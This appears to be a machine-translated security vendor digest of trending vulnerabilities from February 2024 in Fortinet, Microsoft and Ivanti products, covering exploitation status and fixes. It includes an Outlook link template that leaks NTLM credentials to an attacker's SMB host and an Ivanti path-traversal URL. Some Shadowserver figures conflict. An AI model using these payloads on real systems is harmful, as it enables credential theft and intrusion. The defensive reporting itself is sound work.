The eight most dangerous vulnerabilities of February 2024

Hello friends! I'm Alexander Leonov, and together with the Positive Technologies analyst department, we have prepared for you a digest of trending vulnerabilities over the past month.

You will probably immediately ask: what are these trending vulnerabilities? These are dangerous vulnerabilities that are actively used in attacks or are highly likely to be used in the near future.

At the same time, trending ones are not the same as critically dangerous ones. The latter can potentially “put” the work of a mass service on the perimeter of the organization, but at the same time they are difficult to operate. It turns out that there seems to be a vulnerability and it is critically dangerous, but real exploitation may take months and years, or may not come at all. And trending vulnerabilities pose a danger here and now, so they need to be fixed first and foremost and as soon as possible.

Identifying trending vulnerabilities is a complex process that requires ongoing analysis of multiple data sources. Read more about why you can't just analyze a directory CISA KEV and base NVDI wrote in the review of trending vulnerabilities in 2023.

Now let's see what vulnerabilities were trending in the past February.

Vulnerability in Fortinet FortiOS and FortiProxy

1. Remote code execution vulnerability in Fortinet FortiOS and FortiProxy (CVE-2024-21762, CVSS – 9.8)

Exploitation of the vulnerability allows an unauthenticated attacker to execute arbitrary code via specially crafted HTTP requests. An arbitrary code execution vulnerability in Fortinet FortiOS and FortiProxy (CVE-2024-21762), according to the vendor, is used in hacker attacks. Fortinet previously reported that attackers used a similar FortiOS vulnerability to deploy the Coathanger remote access Trojan.

Fortinet's advisory does not provide any details about how the vulnerability is exploited or who discovered it.

Number of potential victims: leaning on to Shadowserver datathe number of devices that have FortiOS SSL VPN is more than 465,000. In Russia, this software was detected on 2816 nodes, also according to Shadowserver.

Publicly available exploits: not publicly available.

⚔️ Remedies and compensatory measures: To eliminate the vulnerability, you need to update the software by following recommendations, given by Fortinet. If you are unable to download updates immediately, you can temporarily disable SSL VPN on FortiOS devices to reduce risk. In Russia, this software was detected on 2638 nodes, according to Shadowserver.

Vulnerabilities in Microsoft products

1. Windows SmartScreen security feature bypass vulnerability (CVE-2024-21351, CVSS – 7.6)

Exploiting this vulnerability allows an attacker to bypass Windows Defender SmartScreen checks. The vulnerability can be used to deliver malware to the system. Its use requires user interaction: the cybercriminal needs to send the target a specially crafted malicious file and convince him to open the contents, which can be used in phishing.

2. Web Page Shortcuts Security Bypass Vulnerability (CVE-2024-21412, CVSS – 8.1)

This vulnerability allows malware to be delivered to the target system. To exploit it, an attacker needs to send the user a link to a resource controlled by the criminal, which hosts a specially created file with a double extension (*.jpeg.url). This file in turn points to another shortcut file containing logic to exploit the previously patched Microsoft Defender SmartScreen bypass vulnerability (CVE-2023-36025).

The phishing page itself is a tag <a>on the attacker's HTML page with the name of the picture (*.jpg). The victim can only click on it, confirm the use of Explorer and open the file itself.

The danger is that Microsoft Defender does not warn the user that the opening is coming from an untrusted resource (the MoTW function does not work). The user may also be confused by the fact that the explorer opens in a folder called Downloads, although in fact it is located on a third-party resource.

3. Microsoft Outlook remote code execution vulnerability (CVE-2024-21413, CVSS – 9.8)

The exploit bypasses Protected View in Microsoft Outlook, allowing a remote attacker to cause the victim to open a malicious document in edit mode, which could lead to remote code execution on the system.

The essence of the attack is that the user receives an email in Outlook with a link (tag <a> in HTML), which, using the file protocol, bypasses Outlook security measures and allows you to deliver a link like this to the victim: <a href=” "file:///\\X.X.X.X\test\test.rtf!something”> Link name </a>where XXXX is an address located on the local network (belongs to the attacker).

In this case, access to the file test.rtf!something will be carried out via the SMB protocol, which means that NTLM information about the user will be disclosed. Suffix !something allows you to avoid security warnings from Microsoft Outlook.

4. Microsoft Exchange server vulnerability leading to unauthorized elevation of privileges (CVE-2024-21410, CVSS – 9.8)

Elevation of privilege vulnerability in Microsoft Exchange Server. Its exploitation allows an attacker to conduct an NTLM Relay attack (a type of attack in which the attacker intercepts authentication data using the NTLM protocol and redirects it to another server or service in order to gain unauthorized access) and successfully authenticate to the Exchange server.

Cases of exploitation of all Microsoft vulnerabilities: according to Microsoft, facts of exploitation of all vulnerabilities have been recorded. In addition, Trend Micro recorded exploitation of vulnerability CVE-2024-21412 by the Water Hydra APT group. Their phishing campaigns were aimed at financial market traders.

Number of potential victims of all Microsoft vulnerabilities: no information.

Publicly available exploits: is publicly available for CVE-2024-21413, for other Microsoft vulnerabilities – no.

⚔️ Remedies, compensatory measures: To fix the vulnerability, security updates are required, they can be downloaded from the official website Microsoft.

Vulnerabilities in Ivanti products

1. Authentication bypass vulnerability in Ivanti Connect Secure and Policy Secure (CVE-2023-46805, CVSS – 8.2)

This is a zero-day vulnerability in Ivanti Connect Secure (ICS), formerly known as Pulse Connect Secure Gateway, and Ivanti Policy Secure. The vulnerability is present in versions 9.x and 22.x and occurs due to the fact that the server does not fully check access to files along one of the paths (/api/v1/totp/user-backup-code). In this regard, an unauthenticated attacker can move through the server directories (api/v1/totp/user-backup-code/../../ to move to parent directories) and interact with endpoints in it.

“When CVE-2023-46805 is used in conjunction with CVE-2024-21887, exploitation does not require authentication and allows an attacker to create malicious requests and execute arbitrary commands on the system (Remote Code Execution).”wrote in Ivanti.

2. Command injection vulnerability in Ivanti Connect Secure and Ivanti Policy Secure (CVE-2024-21887, CVSS – 9.1)

This is another zero-day vulnerability in Ivanti Connect Secure software versions 9.x and 22.x. It allows an attacker authenticated as an administrator to execute arbitrary commands on the device. The point of exploitation is that a malicious argument is supplied to the endpoint, which, when processed by the application, ends up in the function of creating a new process or command (for example: popen(), Python). This vulnerability can be exploited via the Internet.

Using it in conjunction with CVE-2023-46805, You can get Remote Code Execution on a node that does not require authentication.

3. Server-side request forgery vulnerability in Ivanti Connect Secure, Ivanti Policy Secure, Ivanti Neurons for ZTA products (CVE-2024-21893, CVSS – 8.2)

Server-side request forgery (SSRF) is present in Ivanti Connect Secure (ICS) software, in the Security Assertion Markup Language (SAML) component. Occurs due to a lack of authentication, the use of an outdated version of XMLTooling susceptible to SSRF to process XML data on the server side, and the ability to send malicious XML data to the endpoint.

Cases of exploitation of vulnerabilities in Ivanti products: January 15 Volexity reportedthat I found evidence hacking More than 1,700 devices belonging to companies of different sizes and from different industries (for example, organizations from the financial sector, government companies, military institutions).

Number of potential victims of vulnerabilities in Ivanti products: according to Shadowserverthere are more than 19,500 Ivanti Connect Secure devices on the network.

Publicly available exploits: is in the public domain.

⚔️ Remedies and compensatory measures: Ivanti released security updates on February 8th stated, which addressed these vulnerabilities in Ivanti Connect Secure (versions 9.1R14.5, 9.1R17.3, 9.1R18.4, 22.4R2.3, 22.5R1.2, 22.5R2.3 and 22.6R2.2), Ivanti Policy Secure (versions 9.1R17.3, 9.1R18.4 and 22.5R1.2) and ZTA gateways (versions 22.5R1.6, 22.6R1.5 and 22.6R1.7). In cases where security updates are not installed, you can use the XML file that is available to Ivanti customers. It allows you to mitigate the impact of possible exploitation. CISA Agency released article with options for mitigating and eliminating the vulnerability.

How to protect yourself

Using popular products that contain trending vulnerabilities can put any company at risk. Such vulnerabilities are the most dangerous and require immediate correction. To the vulnerability management system MaxPatrol VM information about trending vulnerabilities is received within 12 hours. This allows you to take timely measures to eliminate the most dangerous of them and protect the infrastructure.

Alexander Leonov

Leading expert of the PT Expert Security Center laboratory

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *